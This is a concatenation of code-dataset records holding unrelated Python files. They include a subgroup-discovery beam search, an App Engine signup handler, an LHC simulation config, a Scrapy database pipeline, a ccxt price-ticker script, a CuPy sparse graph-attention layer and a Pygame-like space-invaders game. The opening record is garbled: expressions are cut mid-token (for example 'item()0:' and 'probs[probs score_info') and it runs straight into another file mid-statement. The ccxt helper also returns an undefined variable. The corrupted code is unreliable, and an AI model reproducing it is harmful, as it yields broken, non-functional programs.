result:\n f.write(\"\\t\"+str(r))\n f.write(\"\\n\")\n f.write(\"\\n\")\n print(\"end finished\")\n return result\n\n\ndef pruneFeatures(X, Y, feat_score, ignore, threshold):\n to_be_pruned = []\n for attr_name in [x for x in X if x not in ignore]:\n if feat_score[int(attr_name)].item()0:\n computed_scores_count = computed_scores_count+1\n print (\"computed scores count: {}\".format(computed_scores_count))\n \n\n\ndef createNewWeightMatrix(selectors, original_features, W):\n print(\"create new weight matrix...\")\n new_W= np.zeros((len(selectors),len(selectors)))\n for i in tqdm(range(len(new_W))):\n for j in range(len(new_W)):\n new_W[i,j] = W[original_features[i], original_features[j]] \n return new_W\n\ndef initializeVisitedMatrix(last_beam, selectors, sg_to_beamIndex, sg_to_index):\n visited= np.zeros((len(last_beam),len(selectors))) \n for beam_key in sg_to_beamIndex:\n beam_key_set = convertSGtoSet(beam_key)\n for sel in beam_key_set:\n visited[sg_to_beamIndex[beam_key], sg_to_index[sel]] = 1\n return visited\n\ndef create_sg_to_beamIndex(last_beam):\n sg_to_beamIndex ={}\n for i, (i_score, last_sg) in enumerate(last_beam):\n sg_to_beamIndex[last_sg] = i\n return sg_to_beamIndex\n\n\ndef findPair(i, F, new_W, visited, last_sg, sg_to_beamIndex):\n j_prime = np.argmax(F[i,:])\n weights_vector=new_W[:, j_prime]\n weights_vector = weights_vector * (1-visited[sg_to_beamIndex[last_sg]]) \n j = np.argmax(weights_vector)\n return [j, j_prime]\n\ndef findPair_adaptive(i, F, new_W, visited, last_sg, sg_to_beamIndex, computedScores, selectors):\n probs = np.zeros(len(selectors))\n for j in range(len(selectors)):\n if visited[i,j]:\n probs[j]=0\n else:\n probs[j] = computeProbability(i, j, computedScores, F, new_W, selectors, sg_to_beamIndex)\n # print(\"max: {}\".format(np.max(probs)))\n # print (np.histogram(probs))\n np.save(\"probs.npy\",probs)\n t=probs[probs.argsort()[-5:][::-1][-1]]\n probs[probs score_info[\"best_so_far\"][j]:\n score_info[\"best_so_far\"][j] = new_score\n local_prob = score_info[\"best_so_far\"][j]\n else:\n local_prob = 0 \n final_prob =( (1-weight)*global_prob) + ( weight*local_prob)\n return final_prob\n\ndef computeProbability(i, j, computedScores, F, new_W, selectors, sg_to_beamIndex):\n sg = Conjuction([selectors[j]])\n if sg in computedScores:\n global_prob = computedScores[sg]\n else:\n global_prob = 0\n scores = np.zeros(len(selectors))\n for 
k in range(len(selectors)):\n scores[j] = F[i,k] * new_W[k,j]\n local_prob = np.max(scores)\n if j == 1809:\n print(\"for {}\".format(selectors[j]))\n print (\"global_prob : {}, local_prob: {}\".format(global_prob, local_prob))\n final_prob = global_prob + 2*local_prob\n return final_prob\n\ndef create_sg_vector(selectors, last_sg, j, X):\n sel= selectors[j] \n new_selectors = last_sg.selectors+[sel]\n sg = Conjuction(new_selectors)\n sg_vector = sg.covers(X)\n return sg, sg_vector\n\ndef printHistory(history, sg):\n for pair in history[sg]:\n print(\"{} {}\".format(pair[0], pair[1]))\n\n\ndef track_history(history, sg, sel):\n if sg in history:\n history[sg].append(sel)\n else:\n history[sg] = [sel]\n\ndef getPath(history, sg, sg_to_index):\n indices = []\n for pair in history[sg]:\n j_prime=pair[0]\n index = sg_to_index[j_prime]\n indices.append(index)\n return removeDups(indices)\n\ndef removeDups(seq):\n seen = set()\n seen_add = seen.add\n return [x for x in seq if not (x in seen or seen_add(x))] \n\n\ndef beamSearch_auxData_greedy(V, W, target, X,Y, measure, max_depth=2, beam_width=10, result_set_size=10, threshold=0.3, min_support=1, u=70):\n tempData = [] #debug\n selectors_vals= []\n last_beam = None \n depth = 0\n attemps_threshold=2*u\n F= np.zeros(W.shape)\n [beam, computedScores] = L1_greedy(V,target, X, Y, measure, beam_width, threshold)\n print(beam)\n [selectors, original_features, sg_to_index] = createSelectors(X, []) \n new_W = createNewWeightMatrix(selectors, original_features, W)\n\n history ={}\n\n\n while beam != last_beam and depth < max_depth-1:\n print(\"depth:{}\".format(depth+2))\n last_beam = beam.copy()\n F= np.zeros((beam_width,len(selectors)))\n sg_to_beamIndex = create_sg_to_beamIndex(last_beam)\n visited = initializeVisitedMatrix(last_beam, selectors, sg_to_beamIndex, sg_to_index)\n initalizeScoreMatrix(F, computedScores, sg_to_beamIndex, sg_to_index, selectors, visited)\n for i in range(beam_width-1, -1,-1):\n print(\"expanding {}\".format(last_beam[i][1]))\n # printScoreMatrixStats(F, computedScores, sg_to_beamIndex, sg_to_index, selectors, visited)\n (i_score, last_sg) = last_beam[i]\n##################################\n soi = Conjuction([EquitySelector(\"814\",1)])\n if not (soi == last_sg):\n print(\"not soi, skipped\")\n continue\n print(\"calculating stats...\") \n for j, sel in enumerate(selectors):\n sg, sg_vector = create_sg_vector(selectors, last_sg, j, X)\n outcome_vector = target.covers(Y)\n quality = computeQuality(sg_vector, outcome_vector, measure)\n\n sel_vector = sel.covers(X)\n selectors_vals.append(sel_vector)\n tempData.append(quality)\n\n#############################\n if not getattr(last_sg, 'visited', False):\n setattr(last_sg, 'visited', True)\n pair_count=0\n attemps=0\n while pair_count\"\n subject = \"Thanks for joining Tel Aviv Music Company\"\n body = \"\"\" Thanks you for joining tlvmc \"\"\" % (explain_url, new_BBUser_url)\n mail.send_mail(sender_address, user_address, subject, body)\n\napplication = webapp.WSGIApplication([('/', MainPage),\n ('/welcome', MainPage),\n ('/signup', SignupHandler),\n ('/register', RegisterHandler),\n ('/artist/([^/]+)', ArtistHandler),\n ('/login', LoginHandler)\n ], debug=True)\n\ndef main(): \n logging.getLogger().setLevel(logging.DEBUG)\n run_wsgi_app(application)\nif __name__ == '__main__': main()","sub_path":"main_script.py","file_name":"main_script.py","file_ext":"py","file_size_in_byte":6189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} 
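The subgroup-discovery record above (seq_id 521288) maintains its best candidates with a bounded min-heap: add_if_required pushes while the result list is short and evicts the current minimum once it is full. A minimal sketch of that top-k pattern, detached from the record's Conjuction/selector machinery (the item names and qualities here are invented):

import heapq

def add_if_required(result, item, quality, result_set_size):
    # result is a min-heap of (quality, item); result[0] is the worst retained pair.
    if len(result) < result_set_size:
        heapq.heappush(result, (quality, item))
    elif quality > result[0][0]:
        heapq.heappop(result)                     # drop the current worst...
        heapq.heappush(result, (quality, item))   # ...and keep the better candidate

top = []
for q, name in [(0.2, 'a'), (0.9, 'b'), (0.5, 'c'), (0.7, 'd')]:
    add_if_required(top, name, q, 3)
print(sorted(top, reverse=True))  # [(0.9, 'b'), (0.7, 'd'), (0.5, 'c')]

Because heapq keeps the smallest quality at result[0], a single comparison against result[0][0] decides whether a new candidate displaces the worst retained one, so each update costs O(log k) for a result set of size k.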
+{"seq_id":"448415267","text":"from PyHEADTAIL.machines.synchrotron import Synchrotron\nimport numpy as np\nfrom scipy.constants import c, e, m_p\n\n\nclass EmptyObject(object):\n pass\n\n\nclass LHC(Synchrotron):\n\n def __init__(self, machine_configuration=None, optics_mode='smooth', **kwargs):\n\n pp = EmptyObject()\n\n pp.machine_configuration = machine_configuration\n pp.optics_mode = optics_mode\n\n pp.n_segments = 1\n\n pp.RF_at='end_of_transverse'\n\n pp.longitudinal_mode = 'non-linear'\n pp.alpha = 3.225e-04\n pp.h_RF = 35640\n pp.mass = m_p\n pp.charge = e\n\n if machine_configuration == 'Injection':\n pp.p0 = 450e9 * e / c\n pp.p_increment = 0.\n pp.accQ_x = 64.28\n pp.accQ_y = 59.31\n pp.V_RF = 6e6\n pp.dphi_RF = 0.\n elif machine_configuration == '6.5_TeV_collision_tunes':\n pp.p0 = 6500e9 * e / c\n pp.p_increment = 0.\n pp.accQ_x = 64.31\n pp.accQ_y = 59.32\n pp.V_RF = 12e6\n pp.dphi_RF = 0.\n else:\n raise ValueError('machine_configuration not recognized!')\n\n if optics_mode == 'smooth':\n if 's' in list(kwargs.keys()):\n raise ValueError('s vector cannot be provided if optics_mode = \"smooth\"')\n\n pp.n_segments = kwargs['n_segments']\n pp.circumference = pp.h_RF * 2.5e-9 * c\n\n pp.name = None\n\n pp.beta_x = 92.7\n pp.D_x = 0\n pp.beta_y = 93.2\n pp.D_y = 0\n\n pp.alpha_x = None\n pp.alpha_y = None\n\n pp.s = None\n\n elif optics_mode == 'non-smooth':\n if 'n_segments' in list(kwargs.keys()):\n raise ValueError('n_segments cannot be provided if optics_mode = \"non-smooth\"')\n pp.n_segments = None\n pp.circumference = None\n\n pp.name = kwargs['name']\n\n pp.beta_x = kwargs['beta_x']\n pp.beta_y = kwargs['beta_y']\n\n try:\n pp.D_x = kwargs['D_x']\n except KeyError:\n pp.D_x = 0 * np.array(kwargs['s'])\n try:\n pp.D_y = kwargs['D_y']\n except KeyError:\n pp.D_y = 0 * np.array(kwargs['s'])\n\n pp.alpha_x = kwargs['alpha_x']\n pp.alpha_y = kwargs['alpha_y']\n\n pp.s = kwargs['s']\n\n else:\n raise ValueError('optics_mode not recognized!')\n\n # detunings\n pp.Qp_x = 0\n pp.Qp_y = 0\n\n pp.app_x = 0\n pp.app_y = 0\n pp.app_xy = 0\n\n for attr in list(kwargs.keys()):\n if kwargs[attr] is not None:\n if type(kwargs[attr]) is list or type(kwargs[attr]) is np.ndarray:\n str2print = '[%s ...]'%repr(kwargs[attr][0])\n else:\n str2print = repr(kwargs[attr])\n self.prints('Synchrotron init. 
From kwargs: %s = %s'\n % (attr, str2print))\n\n if not hasattr(pp, attr):\n raise NameError(\"I don't understand %s\"%attr)\n\n setattr(pp, attr, kwargs[attr]) \n\n\n super(LHC, self).__init__(optics_mode=pp.optics_mode, circumference=pp.circumference, n_segments=pp.n_segments, s=pp.s, name=pp.name,\n alpha_x=pp.alpha_x, beta_x=pp.beta_x, D_x=pp.D_x, alpha_y=pp.alpha_y, beta_y=pp.beta_y, D_y=pp.D_y,\n accQ_x=pp.accQ_x, accQ_y=pp.accQ_y, Qp_x=pp.Qp_x, Qp_y=pp.Qp_y, app_x=pp.app_x, app_y=pp.app_y, app_xy=pp.app_xy,\n alpha_mom_compaction=pp.alpha, longitudinal_mode=pp.longitudinal_mode,\n h_RF=np.atleast_1d(pp.h_RF), V_RF=np.atleast_1d(pp.V_RF), dphi_RF=np.atleast_1d(pp.dphi_RF), p0=pp.p0, p_increment=pp.p_increment,\n charge=pp.charge, mass=pp.mass, RF_at=pp.RF_at)\n\n","sub_path":"other/response_to_beam_distorsion/multibunch/machines_for_testing.py","file_name":"machines_for_testing.py","file_ext":"py","file_size_in_byte":4137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"183577263","text":"\n\nfrom frontline.db import session\n\n\nclass SQLAlchemyPipeline:\n\n def process_item(self, item, spider):\n \"\"\"Save a database row.\n \"\"\"\n session.add(item.row())\n\n try:\n session.commit()\n\n except Exception as e:\n session.rollback()\n print(e)\n\n return item\n","sub_path":"frontline/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"609300043","text":"# -*- coding: utf-8 -*-\nimport os\nimport sys\nimport time\nimport ccxt # noqa: E402\nfrom styles import green, yellow, blue, red, pink, bold, underline\n\n\ndef print_args(*args):\n print(' '.join([str(arg) for arg in args]))\n\ndef print_usage():\n print_args(\"Usage: python \" + sys.argv[0], green('id'), yellow('[symbol]'))\n print_args(\"Symbol is required, for example:\")\n print_args(\"python \" + sys.argv[0], green('gdax'), yellow('BTC/USD'))\n get_exchanges()\n\n\ndef print_ticker(exchange, symbol):\n ticker = exchange.fetch_ticker(symbol.upper())\n print_args(\n green(exchange.id),\n yellow(symbol),\n 'ticker',\n ticker['datetime'],\n 'high: ' + str(ticker['high']),\n 'low: ' + str(ticker['low']),\n 'bid: ' + str(ticker['bid']),\n 'ask: ' + str(ticker['ask']),\n 'volume: ' + str(ticker['quoteVolume']))\n\n\n\ndef print_exch_symbols(exchange):\n # output all symbols\n print_args(green(id), 'has', len(exchange.symbols), 'symbols:', yellow(', '.join(exchange.symbols)))\n\n\ndef get_exchanges():\n return ccxt.exchanges\n\n\ndef get_exch_symbols(exchange):\n return exchange.symbols\n\n\ndef get_ticker(exchange, symbol):\n try: \n print_ticker(exchange, symbol)\n # get raw json data\n# ticker = exchange.fetch_ticker(symbol.upper())\n# print(ticker)\n\n except ccxt.DDoSProtection as e:\n print(type(e).__name__, e.args, 'DDoS Protection (ignoring)')\n except ccxt.RequestTimeout as e:\n print(type(e).__name__, e.args, 'Request Timeout (ignoring)')\n except ccxt.ExchangeNotAvailable as e:\n print(type(e).__name__, e.args, 'Exchange Not Available due to downtime or maintenance (ignoring)')\n except ccxt.AuthenticationError as e:\n print(type(e).__name__, e.args, 'Authentication Error (missing API keys, ignoring)')\n \n return ticker\n\n\n\n\nif __name__ == '__main__':\n\n print(\"\\n\\n CCXT -------------------------------------\\n\\n\")\n\n# supported_exchanges = 'Supported exchanges:', ', '.join(get_exchanges())\n# print(supported_exchanges)\n\n 
try:\n\n id = sys.argv[1] # get exchange id from command line arguments\n\n # check if the exchange is supported by ccxt\n exchange_found = id in ccxt.exchanges\n\n if exchange_found:\n print_args('Instantiating', green(id))\n\n # instantiate the exchange by id\n exchange = getattr(ccxt, id)()\n\n # load all markets from the exchange\n markets = exchange.load_markets()\n\n if len(sys.argv) > 2: # if symbol is present, get that symbol only\n symbol = sys.argv[2]\n get_ticker(exchange, symbol)\n else: \n print_args('Symbol not found')\n print_exch_symbols(exchange)\n print_usage()\n\n else:\n print_args('Exchange ' + red(id) + ' not found')\n print_usage()\n\n except Exception as e:\n print(type(e).__name__, e.args, str(e))\n print_usage()\n\n\n\n\n","sub_path":"ccxt_feed.py","file_name":"ccxt_feed.py","file_ext":"py","file_size_in_byte":3046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"234753967","text":"import numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport time\n\nimport scipy as sp\nfrom scipy import sparse\nimport cupy as cp\n\nimport pdb\n\nimport utils\n\nclass SpecialSpmmFunction(torch.autograd.Function):\n \"\"\"Special function for only sparse region backpropataion layer.\"\"\"\n @staticmethod\n def forward(ctx, indices, values, shape, b):\n a = torch.sparse_coo_tensor(indices, values, shape)\n ctx.save_for_backward(a, b)\n ctx.N = shape[0]\n return a @ b\n\n @staticmethod\n def backward(ctx, grad_output):\n a, b = ctx.saved_tensors\n grad_values = grad_b = None\n if ctx.needs_input_grad[1]:\n grad_a_dense = grad_output @ (b.t())\n edges_idx = a._indices()[0, :] * ctx.N + a._indices()[1, :]\n grad_values = grad_a_dense.view(-1)[edges_idx]\n if ctx.needs_input_grad[3]:\n grad_b = a.t() @ grad_output\n return None, grad_values, None, grad_b\n\n\nclass SpecialSpmm(nn.Module):\n def forward(self, indices, values, shape, b):\n return SpecialSpmmFunction.apply(indices, values, shape, b)\n\nclass SpGraphAttentionLayer(nn.Module):\n \"\"\"\n Sparse version GAT layer, similar to https://arxiv.org/abs/1710.10903\n \"\"\"\n\n def __init__(self, in_features, out_features, dropout, alpha, concat=True):\n super(SpGraphAttentionLayer, self).__init__()\n self.in_features = in_features\n self.out_features = out_features\n self.alpha = alpha\n self.concat = concat\n\n self.W = nn.Parameter(torch.zeros(size=(in_features, out_features)))\n nn.init.xavier_normal_(self.W.data, gain=1.414)\n \n self.a = nn.Parameter(torch.zeros(size=(2*out_features,1)))\n nn.init.xavier_normal_(self.a.data, gain=1.414)\n\n self.dropout = nn.Dropout(dropout)\n self.leakyrelu = nn.LeakyReLU(self.alpha)\n # self.special_spmm = SpecialSpmm()\n\n self.calculatedWh = False\n\n def forward(self, feats, adj, nodes=None, ts=[],dv='cuda'):\n # TODO for now, nodes is not needed -- we are not sharding\n # dv = 'cuda' if feats.is_cuda else 'cpu'\n N = feats.shape[0]\n mvtime = 0\n calctime = 0\n cootime = 0\n searchtime = 0\n csctime = 0\n row_csr_starts, col_csr = adj\n\n if not self.calculatedWh:\n t = time.time()\n feats = feats.cuda() if dv==\"cuda\" else feats\n\n t2 = time.time()\n h = feats @ self.W\n self.h = h\n\n t3 = time.time()\n a1 = self.a[:self.out_features,:] # self-att\n a2 = self.a[self.out_features:,:] # neigh-att\n \n t4 = time.time()\n # TODO these activations are supposed to happen individually for each edge, but we'll ignore that for now\n self.hself = torch.exp(-self.leakyrelu(h@a1)) \n self.hneigh = 
torch.exp(-self.leakyrelu(h@a2)) # (N,1)\n \n t5 = time.time()\n hself = self.hself\n hneigh = self.hneigh\n\n mvtime += t2 - t #makes up for half the time on sparse graphs\n calctime += t3 - t2 + t5 - t4\n # mvtime += t4 - t3\n else:\n hself = self.hself\n hneigh = self.hneigh\n h = self.h\n\n # t = time.time()\n # adj = adj[nodes]\n \n # t2 = time.time()\n # adj = adj.cuda() if dv==\"cuda\" else adj # makes up for 10% of time on sparse graphs\n \n # mvtime += time.time() - t2\n # searchtime += t2 - t\n\n # pdb.set_trace()\n # edges = adj.nonzero().t()\n\n # Self-attention on the nodes - Shared attention mechanism\n # here's the manual implementation\n row_csr_starts_cpu = row_csr_starts\n \n t = time.time()\n if dv=='cuda':\n row_csr_starts = torch.tensor(row_csr_starts).squeeze().cuda()\n col_csr = torch.tensor(col_csr).squeeze().cuda()\n mvtime += time.time() - t\n\n if dv=='cuda':\n upper_row_starts = utils.torch2cupy(row_csr_starts,squeeze=1)\n upper_cols = utils.torch2cupy(col_csr,squeeze=1)\n lower_col_starts = utils.torch2cupy(row_csr_starts,squeeze=1)\n lower_rows = utils.torch2cupy(col_csr,squeeze=1)\n else:\n upper_row_starts = row_csr_starts\n upper_cols = col_csr\n lower_col_starts = row_csr_starts\n lower_rows = col_csr\n \n # TODO searchsort is done on cpu\n t1=time.time()\n vidxs = np.arange(col_csr.shape[0])+1\n d = np.searchsorted(row_csr_starts_cpu,vidxs)-1\n\n t2 = time.time()\n if dv=='cuda': d = torch.tensor(d).cuda()\n\n t3 = time.time()\n selfd = hself[d]\n neighd = hneigh[d]\n selfv = hself[col_csr]\n neighv = hneigh[col_csr]\n t4 = time.time()\n\n # upper_csr_values = hself[d] + hneigh[upper_cols]\n upper_csr_values = selfd + neighv\n # lower_csc_values = hneigh[d] + hself[lower_rows]\n lower_csc_values = neighd + selfv\n diag_values = hneigh + hself\n\n upper_csr_values = self.dropout(upper_csr_values)\n lower_csc_values = self.dropout(lower_csc_values)\n diag_values = self.dropout(diag_values)\n\n calctime += time.time() - t4\n searchtime += t2 -t1 + t4-t3\n mvtime += t3-t2\n # instead of manually doing the csr stuff, let scipy handle it\n # since we are only timing how large an impact the memory transfer to gpu is\n t = time.time()\n if dv=='cuda':\n upper_csr_values = utils.torch2cupy(upper_csr_values,squeeze=1) \n lower_csc_values = utils.torch2cupy(lower_csc_values,squeeze=1)\n diag_values = utils.torch2cupy(diag_values)\n else:\n upper_csr_values = upper_csr_values.numpy().squeeze()\n lower_csc_values = lower_csc_values.numpy().squeeze()\n diag_values = diag_values.cpu().numpy()\n mvtime += time.time() - t\n\n if dv=='cuda':\n upper_csr = cp.sparse.csr_matrix((upper_csr_values,upper_cols,upper_row_starts),shape=(N,N))\n lower_csc = cp.sparse.csc_matrix((lower_csc_values,lower_rows,lower_col_starts),shape=(N,N))\n else:\n upper_csr = sp.sparse.csr_matrix((upper_csr_values,upper_cols,upper_row_starts),shape=(N,N))\n lower_csc = sp.sparse.csc_matrix((lower_csc_values,lower_rows,lower_col_starts),shape=(N,N))\n\n # calculate the matrix products with the att matrix\n if dv=='cuda':\n h = utils.torch2cupy(h)\n else:\n h = h.numpy()\n\n t = time.time()\n upper_sum = upper_csr.sum(axis=1)\n j = time.time()\n lower_sum = lower_csc.sum(axis=1)\n csctime+=time.time()-j\n e_rowsum = upper_sum + lower_sum + diag_values\n\n upper_prod = upper_csr.dot(h)\n # upper_prod = upper_csr@(h)\n lower_prod = lower_csc.dot(h)\n # lower_prod = lower_csc@(h)\n csctime += time.time() - t\n if dv=='cuda':\n h_prime = torch.zeros((N,self.out_features)).cuda()\n h_prime_cupy = 
utils.torch2cupy(h_prime)\n h_prime_cupy += upper_prod + lower_prod + (diag_values*h)\n h_prime_cupy = h_prime_cupy / e_rowsum\n else:\n h_prime = upper_prod + lower_prod + (diag_values*h)\n h_prime = h_prime / e_rowsum\n h_prime = torch.tensor(h_prime)\n\n if self.concat:\n # if this layer is not last layer,\n out = F.elu(h_prime)\n else:\n # if this layer is last layer,\n out = h_prime\n\n calctime += time.time() - t\n\n t = time.time()\n if dv=='gpu' and out.device!='cpu': out = out.cpu()\n mvtime+= time.time()-t\n \n ts.append([mvtime,searchtime,calctime,csctime])\n return out\n\n def __repr__(self):\n return self.__class__.__name__ + ' (' + str(self.in_features) + ' -> ' + str(self.out_features) + ')'\n","sub_path":"pyGAT/layers_cupy_csr_csc.py","file_name":"layers_cupy_csr_csc.py","file_ext":"py","file_size_in_byte":8068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"128754110","text":"from PPlay.window import *\nfrom PPlay.gameimage import *\nfrom PPlay.sprite import *\nfrom PPlay.mouse import *\nfrom settings import *\nimport random\n\ndef jogoLoop(janela,dificuldade):\n sp_monster = None\n teclado = janela.get_keyboard()\n\n #Configurações\n h_pressed = False\n show_fps = False\n dificult = dificuldade\n points = 0\n\n #Player\n player_life = 3\n player_vel = PLAYER_V * 10/dificult\n player = Sprite(player_img)\n player.set_position(janela_WIDTH/2 - PLAYER_WIDTH/2, janela_HEIGHT - 2 - PLAYER_HEIGHT)\n\n #Shoots\n shoot_vel = SHOOT_V * 10/dificult\n enemy_shoot_vel = SHOOT_V * 5/dificult\n shoots = []\n last_shoot = 0\n enemy_shoot_delay = 2000/(dificult * 0.8)\n last_enemy_shoot = 0\n enemy_shoots = []\n\n #Enemy\n #Com base no tamanho da tela calcula quantos monstros devem ter na matriz\n enemy_per_line = int(janela_WIDTH/(enemy1_width + enemy_padding + 3/100 * janela_WIDTH) - 2)\n enemy_per_col = int(janela_HEIGHT/(enemy1_height + enemy_padding + 3/100 * janela_HEIGHT) - 2)\n\n #Matriz\n matriz_mov_delay = 1000/(dificult * 0.7)\n matriz_width = ((enemy_per_line - 1) * (enemy1_width + enemy_padding) + enemy1_width)\n matriz_height = ((enemy_per_col - 1) * (enemy1_height + enemy_padding) + enemy1_height)\n matriz = []\n matriz_x = janela_WIDTH/2 - matriz_width/2\n matriz_y = 3/100 * janela_HEIGHT\n matriz_x_vel = matriz_x_ch\n left_collide = False\n right_collide = True\n\n #A cada 2 segundos a matriz move k pixels no eixo x\n last_mov = 0\n\n #Contador do fps\n fps_delay = 0\n\n #Animação\n explosoes = []\n\n rand_x = random.randint(0,enemy_per_col-1)\n rand_y = random.randint(0,enemy_per_line-1)\n\n #Cria a matriz de monstros inicial\n for i in range(0,enemy_per_col):\n aux = []\n aux_padding_y = 0\n if(i != 0):\n aux_padding_y = enemy_padding\n for j in range(0,enemy_per_line):\n aux_padding_x = 0\n if(j != enemy_per_line):\n aux_padding_x = enemy_padding\n if(i == rand_x and j == rand_y):\n enemy_aux = Sprite(enemy1_img_sp)\n sp_monster = enemy_aux\n else:\n enemy_aux = Sprite(enemy1_img)\n enemy_aux.set_position((j * (enemy1_width + enemy_padding)) + matriz_x, (i * (enemy1_height + enemy_padding)) + matriz_y)\n aux.append(enemy_aux)\n matriz.append(aux)\n\n\n while(True):\n janela.set_background_color([0,0,0])\n\n if(teclado.key_pressed(\"escape\")):\n return points\n\n if(teclado.key_pressed(\"h\")):\n if(not h_pressed):\n show_fps = not show_fps\n h_pressed = True\n else:\n h_pressed = False\n\n fps_delay += janela.delta_time()\n\n if(show_fps):\n #Só atualiza o fps a cada 0.75 segundos\n if(fps_delay >= 0.75):\n 
fps_delay = 0\n if(janela.delta_time() == 0):\n text = \"999\"\n else:\n text = str(int(1/janela.delta_time()))\n janela.draw_text(text, 5, 5, 12, (255,255,255))\n\n #Desenha a pontuação\n aux_points = \"Points: \"+str(points)\n janela.draw_text(aux_points, janela_WIDTH - 150, 20, 20, (255,255,255))\n\n #Desenha a quantidade de vida do player\n aux_life = \"Life: \"+str(player_life)\n janela.draw_text(aux_life, janela_WIDTH - 150, 50, 20, (255,255,255))\n\n #Faz o controle da movimentação do Player (d -> Direita, a -> Esquerda)\n if(teclado.key_pressed(\"d\")):\n player.x += player_vel * janela.delta_time()\n elif(teclado.key_pressed(\"a\")):\n player.x -= player_vel * janela.delta_time()\n\n #Faz o sistema de Warp do player nas bordas da tela\n if(player.x > janela_WIDTH):\n player.x = 0 - PLAYER_WIDTH\n if(player.x + PLAYER_WIDTH < 0):\n player.x = janela_WIDTH\n\n #Faz o disparo do tiro do Player\n if(janela.time_elapsed() - last_shoot > RELOAD_TIME * dificult):\n if(teclado.key_pressed(\"space\")):\n last_shoot = janela.time_elapsed()\n shoot = Sprite(shoot_img)\n shoot.x = player.x + PLAYER_WIDTH/2\n shoot.y = player.y + 5\n shoots.append(shoot)\n\n #Atualiza a posição de cada tiro do Player\n for k,shoot in enumerate(shoots):\n #Se o tiro sair da tela ele deve ser destruido\n if(shoot.y - shoot.height < 0):\n del shoots[k]\n else:\n shoot.y -= shoot_vel * janela.delta_time()\n shoot.draw()\n\n #Redesenha os monstros com base no offset da matriz\n matriz_is_empty = True\n for i,line in enumerate(matriz):\n for j,enemy in enumerate(line):\n if(enemy != None):\n #Guarda se a matriz está vazia\n matriz_is_empty = False\n enemy.set_position((j * (enemy1_width + enemy_padding)) + matriz_x, (i * (enemy1_height + enemy_padding)) + matriz_y)\n enemy.draw()\n\n #Uma nova Wave só é criada se a matriz atual estiver vazia e ocupar menor de 2/3 do tamanho da tela\n if(matriz_is_empty and matriz_width < 2/3 * janela_WIDTH):\n #Cada level rende ao Player 1000 pontos\n points += 1000\n #Cada level aumenta a dificuldade em 0.5\n dificult += 0.5\n #Atualiza os valores que dependem da dificuldade\n player_vel = PLAYER_V * 10/dificult\n shoot_vel = SHOOT_V * 10/dificult\n matriz_mov_delay = 1000/(dificult * 0.7)\n enemy_shoot_delay = 1000/(dificult * 0.8)\n\n #Limpa a matriz de monstros\n matriz = []\n #Os monstros só são adicionados no sentido horizontal\n enemy_per_line = enemy_per_line + 1\n matriz_width += enemy1_width + enemy_padding\n matriz_x = janela_WIDTH/2 - matriz_width/2\n matriz_y = 3/100 * janela_HEIGHT\n\n #Randomiza o monstro especial\n rand_x = random.randint(0,enemy_per_col-1)\n rand_y = random.randint(0,enemy_per_line-1)\n\n #Passa novamente pelo processo de criação da matriz\n for i in range(0,enemy_per_col):\n aux = []\n aux_padding_y = 0\n if(i != 0):\n aux_padding_y = enemy_padding\n for j in range(0,enemy_per_line):\n aux_padding_x = 0\n if(j != enemy_per_line):\n aux_padding_x = enemy_padding\n if(rand_x == i and rand_y == j):\n enemy_aux = Sprite(enemy1_img_sp)\n sp_monster = enemy_aux\n else:\n enemy_aux = Sprite(enemy1_img)\n enemy_aux.set_position((j * (enemy1_width + enemy_padding)) + matriz_x, (i * (enemy1_height + enemy_padding)) + matriz_y)\n aux.append(enemy_aux)\n matriz.append(aux)\n\n #Faz a movimentação de toda a matriz a cada determinado tempo\n if(janela.time_elapsed() - last_mov > matriz_mov_delay):\n last_mov = janela.time_elapsed()\n aux = -2\n #Faz os testes de colisão que são retornados para a variável aux\n for linha in matriz:\n for enemy in linha:\n 
if(enemy != None):\n #Testa se o monstro se chocou contra o player\n if(enemy.y + enemy1_height >= player.y):\n aux = 0\n break\n #Testa se o monstro está a 20 pixels de distância da borda e se ele pode colidir com o lado direito\n if(enemy.x + enemy1_width > janela_WIDTH - 20 and right_collide):\n #Como a movimentação da matriz é feita com porções de 10 pixels, deve-se\n #criar uma flag que irá sinalizar se a matriz já colidiu com a extremidade\n #oposta da tela, evitando sucessivas colisões\n left_collide = True\n right_collide = False\n aux = -1\n break\n #Faz o mesmo do anterior, porém para o lado esquerdo\n if(enemy.x < 20 and left_collide):\n left_collide = False\n right_collide = True\n aux = -1\n break\n #Se algum monstro já colidiu não a necessidade de continuar testando\n if(aux != -2):\n break\n\n #Fim de jogo\n if(aux == 0):\n return points\n #Os monstros começam a se deslocar para o lado oposto\n elif(aux == -1):\n matriz_x_vel *= -1\n matriz_y += matriz_y_ch\n matriz_x += matriz_x_vel\n\n #Cria os tiros dos monstros\n if(janela.time_elapsed() - last_enemy_shoot > enemy_shoot_delay):\n last_enemy_shoot = janela.time_elapsed()\n aux_vetor_enemy = []\n #Percorre a matriz guardando todos os monstros que ainda estão vivos\n for i in matriz:\n for enemy in i:\n if(enemy != None):\n aux_vetor_enemy.append(enemy)\n\n #Escolhe um monstro aleatóriamente para atirar\n random.shuffle(aux_vetor_enemy)\n aux_shoot = Sprite(shoot_img)\n aux_shoot.x = aux_vetor_enemy[0].x + enemy1_width/2\n aux_shoot.y = aux_vetor_enemy[0].y + enemy1_height + 5\n enemy_shoots.append(aux_shoot)\n\n #Testa se cada tiro dos monstros se chocou contra o player\n for k,tiro in enumerate(enemy_shoots):\n if(tiro.y >= player.y):\n if(tiro.collided(player)):\n player_life -= 1\n del enemy_shoots[k]\n\n #Atualiza o tiro dos monstros\n for k,shoot in enumerate(enemy_shoots):\n #Testa se o tiro saiu da janela\n if(shoot.y > janela_HEIGHT):\n del enemy_shoots[k]\n else:\n shoot.y += enemy_shoot_vel * janela.delta_time()\n shoot.draw()\n\n if(player_life <= 0):\n return points\n\n #Colisão do tiro otimizada (FPS ocilando entre 200 e 300)\n for k,tiro in enumerate(shoots):\n #Otimização de colisão\n if(tiro.x >= matriz_x and tiro.x <= matriz_x + matriz_width and tiro.y >= matriz_y and tiro.y <= matriz_y + 